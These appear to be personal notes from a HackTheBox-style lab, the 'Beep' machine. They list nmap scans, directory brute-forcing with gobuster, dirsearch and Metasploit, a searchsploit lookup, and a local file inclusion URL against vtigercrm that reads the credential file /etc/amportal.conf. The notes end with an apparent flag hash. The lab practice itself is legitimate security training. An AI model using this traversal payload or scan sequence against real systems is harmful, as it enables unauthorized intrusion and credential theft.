sudo nmap -sS --min-rate 5000 --max-retries 1 -p- 10.10.10.7

nmap -A 10.10.10.7
nmap -sT -sV -p 1-65535 10.10.10.7 -A
nmap -sT -sV -p 1-65535 beep.htb -A


gobuster -e -u https://10.10.10.7/ -t 500 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

-t = threads
-e = expanded mode print full URL:s

https://10.10.10.7/admin/config.php

use auxiliary/scanner/http/dir_scanner   
msf auxiliary(dir_scanner) >set dictionary /usr/share/wordlists/dirb/common.txt
msf auxiliary(dir_scanner) >set rhosts 192.168.1.5
msf auxiliary(dir_scanner) > set path 10.10.10.7
msf auxiliary(dir_scanner) >exploit


./dirsearch.py -u 10.10.10.7 -e php -f -x 400,403,404

dirbuster 500 threads + medium-23

curl -k (ignore certficates)

searchsploit -x exploits/php/webapps/37637.pl


https://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action


wc -l /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

g:/nologin/d (remove all occurances that have that within)


aeff3def0c765c2677b94715cffa73ac




